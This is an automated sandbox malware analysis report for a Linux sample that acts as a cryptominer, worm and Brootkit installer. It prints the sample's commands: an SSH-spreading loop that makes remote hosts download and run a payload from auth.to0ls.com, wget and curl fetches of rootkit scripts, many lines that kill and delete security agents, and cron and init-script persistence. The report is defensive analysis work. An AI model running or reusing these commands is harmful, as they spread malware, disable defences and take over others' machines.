Play interactive tour

Edit tour

Analysis Report 1EC6U55yrZ

Overview

General Information

Joe Sandbox Version:	26.0
Analysis ID:	901718
Start date:	02.07.2019
Start time:	07:47:36
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1EC6U55yrZ
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:	MAL
Classification:	mal100.spre.troj.evad.mine.lin@0/42@22/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	100	0 - 100	Report FP / FN	false

Classification

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Local Job Scheduling2	Local Job Scheduling2	Port Monitors	Rootkit1	Credential Dumping	Security Software Discovery11	SSH Hijacking1	Data from Local System1	Data Encrypted1	Standard Cryptographic Protocol1
Replication Through Removable Media	Command-Line Interface11	Hidden Files and Directories1	Accessibility Features	Hidden Files and Directories1	Network Sniffing	File and Directory Discovery1	Remote File Copy1	Data from Removable Media	Exfiltration Over Other Network Medium	Remote File Copy1
Drive-by Compromise	Scripting13	.bash_profile and .bashrc1	Path Interception	Disabling Security Tools1	Input Capture	Query Registry	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol3
Exploit Public-Facing Application	Scheduled Task	System Firmware	DLL Search Order Hijacking	Scripting13	Credentials in Files	System Network Configuration Discovery	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol23
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	File Deletion11	Account Manipulation	Remote System Discovery	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol

Signature Overview

Click to jump to signature section

Bitcoin Miner:

Found strings related to Crypto-Mining

Show sources

Source: 1EC6U55yrZ	String found in binary or memory: flags=("stratum+tcp" "cryptonight" "supportxmr.com" "minexmr.com" "poolin.com" "dwarfpool.com" "nanopool.com" "f2pool.com")
Source: 1EC6U55yrZ	String found in binary or memory: flags=("stratum+tcp" "cryptonight" "supportxmr.com" "minexmr.com" "poolin.com" "dwarfpool.com" "nanopool.com" "f2pool.com")
Source: 1EC6U55yrZ	String found in binary or memory: flags=("stratum+tcp" "cryptonight" "supportxmr.com" "minexmr.com" "poolin.com" "dwarfpool.com" "nanopool.com" "f2pool.com")

Spreading:

Found strings indicative of a multi-platform dropper

Show sources

Source: 1EC6U55yrZ	String: declare -a down_method_arr=("wget" "curl" "python" "tcp")
Source: 1EC6U55yrZ	String: echo "for i in \`cat /tmp/.h\` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no \`whoami\`@\$i \"wget -c -O /tmp/$ShellProceName $DownloadURL_shell;curl -o /tmp/$ShellProceName $DownloadURL_shell;python -c \\\"import urllib;urllib.urlretrieve(\\\\\\\"$DownloadURL_shell\\\\\\\", \\\\\\\"/tmp/$ShellProceName\\\\\\\")\\\";php -r '\\\$f=fopen(\\\"'/tmp/$ShellProceName'\\\",\\\"w\\\");fwrite(\\\$f, implode(\\\"\\\",@file(\\\"'$DownloadURL_shell'\\\")));fclose(\\\$f);';chmod 755 /tmp/$ShellProceName;(exec /tmp/$ShellProceName &> /dev/null &)\" &> /dev/null &); done" >> /tmp/.helpdd
Source: .helpdd.34.dr	String: for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '\$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite(\$f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose(\$f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)" &> /dev/null &); done

Sample spreads through ssh

Show sources

Source: /bin/sh (PID: 21967)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21967)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21967)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21967)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982)	Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"

Networking:

Executes the "wget" command typically used for HTTP/S downloading

Show sources

Source: /bin/bash (PID: 22572)	Wget executable: /usr/bin/wget -> wget -O /tmp/.../brootkit.sh http://auth.to0ls.com/l/tiktoor/brootkit.sh
Source: /bin/bash (PID: 22614)	Wget executable: /usr/bin/wget -> wget -O /tmp/.../install.sh http://auth.to0ls.com/l/tiktoor/install.sh
Source: /bin/bash (PID: 23684)	Wget executable: /usr/bin/wget -> wget -O /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt

HTTP GET or POST without a user agent

Show sources

Source: global traffic

HTTP traffic detected: GET /l/ver.txt HTTP/1.0

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /l/tiktoor/brootkit.sh HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /l/tiktoor/install.sh HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /l/ver.txt HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /l/ver.txt HTTP/1.1Host: auth.to0ls.comUser-Agent: curl/7.47.0Accept: /
Source: global traffic	HTTP traffic detected: GET /l/ver.txt HTTP/1.0Host: auth.to0ls.comUser-Agent: Python-urllib/1.17
Source: global traffic	HTTP traffic detected: GET /l/ver.txt HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /l/sodd/syn HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: /Accept-Encoding: identityHost: auth.to0ls.comConnection: Keep-Alive

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: auth.to0ls.com

Urls found in memory or binary data

Show sources

Source: 1EC6U55yrZ	String found in binary or memory: http://$remote_host/l/ver.txt
Source: .helpdd.34.dr	String found in binary or memory: http://auth.to0ls.com/shell
Source: .helpdd.34.dr	String found in binary or memory: http://auth.to0ls.com/shell;curl
Source: .helpdd.34.dr	String found in binary or memory: http://auth.to0ls.com/shell;python

Uses HTTPS

Show sources

Source: unknown

Network traffic detected: HTTP traffic on port 42308 -> 443

System Summary:

Sample contains strings that are potentially command strings

Show sources

Source: Initial sample	Potential command found: service safedog stop >/dev/null 2>&1
Source: Initial sample	Potential command found: rmmod sddev >/dev/null 2>&1
Source: Initial sample	Potential command found: sleep 3
Source: Initial sample	Potential command found: killall -9 sdmonitor >/dev/null 2>&1
Source: Initial sample	Potential command found: killall sdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: killall udcenter >/dev/null 2>&1
Source: Initial sample	Potential command found: killall sdcmd >/dev/null 2>&1
Source: Initial sample	Potential command found: killall sdsvrd >/dev/null 2>&1
Source: Initial sample	Potential command found: killall sdacm >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/sd_uninstall >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/init.d/sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/init.d/safedog >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/init.d/sdboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/init.d/udboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc2.d/S99udboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc3.d/S99udboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc4.d/S99udboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc5.d/S99udboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc2.d/S99sdboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc3.d/S99sdboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc4.d/S99sdboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/rc5.d/S99sdboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdmonitor >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sd_autoexmn >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/runsdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/udboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/udcenter >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/udpro >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdalarm >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdsetos >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/safedog_uninstall >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /usr/bin/safedog >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /usr/bin/sdboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdstart >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdsvrd >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdwebdir >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdrtdefendupdate >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdcmd >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdtest >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdui >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sduibin >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdcloud >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/udinstall >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdacm >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/sdrepo >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/uduninstall >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /usr/bin/SDDownload >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/sdinfo.conf >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/udcenter.conf >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog/libs/safedog >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog/libs/sdcommon >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog/libs/sdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/cloudhelper >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/init.d/sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/init.d/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/init.d/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/init.d/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/init.d/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog/sdcc/bin/sdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /usr/bin/sdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog/sdcc/script/runsdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /usr/bin/runsdcc >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog/sdcc/script/sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /usr/bin/sdccboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/safedog/logs/sdcc.log >/dev/null 2>&1
Source: Initial sample	Potential command found: killall udpro>/dev/null 2>&1 >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/safedog/sdcc/script/udboot >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/safedog/sdcc/bin/udcenter >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/safedog/sdcc/bin/udpro >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/safedog/sdcc/bin/sdalarm >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/safedog/server/script/sdsetos >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/safedog/script/safedog_uninstall >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -rf /etc/sd_uninstall/ >/dev/null 2>&1
Source: Initial sample	Potential command found: killall sduibin >/dev/null 2>&1
Source: Initial sample	Potential command found: killall -9 aegis_cli >/dev/null 2>&1
Source: Initial sample	Potential command found: killall -9 aegis_update >/dev/null 2>&1
Source: Initial sample	Potential command found: killall -9 AliYunDun >/dev/null 2>&1
Source: Initial sample	Potential command found: killall -9 AliHids >/dev/null 2>&1
Source: Initial sample	Potential command found: killall -9 AliYunDunUpdate >/dev/null 2>&1
Source: Initial sample	Potential command found: rm -f /etc/init.d/aegis
Source: Initial sample	Potential command found: rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
Source: Initial sample	Potential command found: rm -f "/etc/rc2.d/S80aegis"
Source: Initial sample	Potential command found: rm -f "/etc/rc3.d/S80aegis"
Source: Initial sample	Potential command found: rm -f "/etc/rc4.d/S80aegis"
Source: Initial sample	Potential command found: rm -f "/etc/rc5.d/S80aegis"
Source: Initial sample	Potential command found: rm -f "/etc/rc.d/rc2.d/S80aegis"
Source: Initial sample	Potential command found: rm -f "/etc/rc.d/rc3.d/S80aegis"
Source: Initial sample	Potential command found: rm -f "/etc/rc.d/rc4.d/S80aegis"
Source: Initial sample	Potential command found: rm -f "/etc/rc.d/rc5.d/S80aegis"

Classification label

Show sources

Source: classification engine

Classification label: mal100.spre.troj.evad.mine.lin@0/42@22/0

Persistence and Installation Behavior:

Detected Linux Brootkit rootkit

Show sources

Source: brootkit.sh.1192.dr	IOC string 'BR_ROOTKIT_PATH' found: BR_ROOTKIT_PATH="/usr/include/..."
Source: install.sh.837.dr	IOC string 'BR_ROOTKIT_PATH' found: BR_ROOTKIT_PATH="/home/$USER/..."
Source: install.sh.837.dr	IOC string 'BR_ROOTKIT_PATH' found: mkdir -p $BR_ROOTKIT_PATH -m 0777
Source: install.sh.837.dr	IOC string 'BR_ROOTKIT_PATH' found: cp brootkit.sh $BR_ROOTKIT_PATH
Source: install.sh.837.dr	IOC string 'BR_ROOTKIT_PATH' found: chmod 777 $BR_ROOTKIT_PATH

Sample reads /proc/mounts (often used for finding a writable filesystem)

Show sources

Source: /lib/systemd/system-generators/lvm2-activation-generator (PID: 22427)

File: /proc/22427/mounts

Sample tries to persist itself using /etc/profile

Show sources

Source: /bin/cp (PID: 23641)

File: /etc/profile.d/emacs.sh

Sample tries to persist itself using System V runlevels

Show sources

Source: /bin/bash (PID: 19422)	File: /etc/rc.local
Source: /bin/ln (PID: 22275)	File: /etc/rcS.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22278)	File: /etc/rc0.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22282)	File: /etc/rc1.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22287)	File: /etc/rc2.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22294)	File: /etc/rc3.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22299)	File: /etc/rc4.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22306)	File: /etc/rc5.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22313)	File: /etc/rc6.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc0.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc1.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc1.d/S03single -> ../init.d/single
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc2.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc3.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc4.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc5.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rc6.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/rcS.d/S02diskmanagerd -> ../init.d/diskmanagerd

Sample tries to persist itself using cron

Show sources

Source: /bin/bash (PID: 19422)	File: /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 19422)	File: /etc/crontab

Sets full permissions to files and/or directories

Show sources

Source: /bin/bash (PID: 19368)	Chmod executable with 777: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 19496)	Chmod executable with 777: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 22554)	Chmod executable with 777: /bin/chmod -> chmod 777 /tmp/...
Source: /tmp/.../install.sh (PID: 23638)	Chmod executable with 777: /bin/chmod -> chmod 777 /usr/include/...

Creates hidden files and/or directories

Show sources

Source: /bin/mkdir (PID: 19367)	Directory: ...
Source: /bin/mkdir (PID: 19495)	Directory: ...
Source: /bin/mkdir (PID: 22550)	Directory: ...
Source: /bin/mkdir (PID: 23617)	Directory: ...

Executes python code directly via command shell that might indicate malicious behavior

Show sources

Source: /bin/bash (PID: 23739)

Python code executed via command shell: /usr/bin/python -> python -c "import urllib;urllib.urlretrieve('http://auth.to0ls.com/l/ver.txt', '/tmp/vxbkyxrlq2hly2s')"

Executes the "chmod" command used to modify permissions

Show sources

Source: /bin/bash (PID: 19368)	Chmod executable: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 19413)	Chmod executable: /bin/chmod -> chmod 755 /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 19496)	Chmod executable: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 21709)	Chmod executable: /bin/chmod -> chmod +x /tmp/.helpdd
Source: /bin/bash (PID: 22267)	Chmod executable: /bin/chmod -> chmod 755 /etc/init.d/diskmanagerd
Source: /bin/bash (PID: 22536)	Chmod executable: /bin/chmod -> chmod 755 /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 22554)	Chmod executable: /bin/chmod -> chmod 777 /tmp/...
Source: /bin/bash (PID: 22651)	Chmod executable: /bin/chmod -> chmod 755 /tmp/.../brootkit.sh
Source: /bin/bash (PID: 22652)	Chmod executable: /bin/chmod -> chmod 755 /tmp/.../install.sh
Source: /tmp/.../install.sh (PID: 23638)	Chmod executable: /bin/chmod -> chmod 777 /usr/include/...

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Show sources

Source: /bin/bash (PID: 23711)

Curl executable: /usr/bin/curl -> curl -o /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt

Executes the "grep" command used to find patterns in files or piped streams

Show sources

Source: /bin/bash (PID: 19341)	Grep executable: /bin/grep -> grep PING
Source: /bin/bash (PID: 19384)	Grep executable: /bin/grep -> grep [Cc]ent[Oo][Ss]
Source: /bin/bash (PID: 19400)	Grep executable: /bin/grep -> grep [Uu]buntu
Source: /bin/bash (PID: 19468)	Grep executable: /bin/grep -> grep PING
Source: /bin/bash (PID: 19499)	Grep executable: /bin/grep -> grep [Cc]ent[Oo][Ss]
Source: /bin/bash (PID: 19501)	Grep executable: /bin/grep -> grep [Uu]buntu
Source: /bin/bash (PID: 19504)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19505)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19513)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19514)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19548)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19549)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19565)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19566)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19585)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19586)	Grep executable: /bin/grep -> grep /bin/bash
